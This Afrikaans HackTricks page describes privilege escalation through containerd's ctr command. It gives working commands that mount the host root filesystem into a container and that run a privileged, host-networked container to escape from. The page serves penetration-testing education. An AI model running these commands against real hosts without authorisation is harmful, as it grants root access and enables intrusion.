HackTricksContainerd (ctr) Privilege Escalation
Reading time: 2 minutes
tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Basiese inligting
Gaan na die volgende skakel om te leer wat is containerd en ctr:
PE 1
as jy vind dat 'n gasheer die ctr opdrag bevat:
which ctr
/usr/bin/ctr
U kan die beelde lys:
ctr image list
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
En dan hardloop een van daardie beelde deur die gasheer se wortelgids na dit te monteer:
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
PE 2
Voer 'n bevoorregte houer uit en ontsnap daarvan.
Jy kan 'n bevoorregte houer uitvoer as:
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
Dan kan jy sommige van die tegnieke wat op die volgende bladsy genoem word gebruik om daarvan te ontsnap deur bevoorregte vermoëns te misbruik:
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.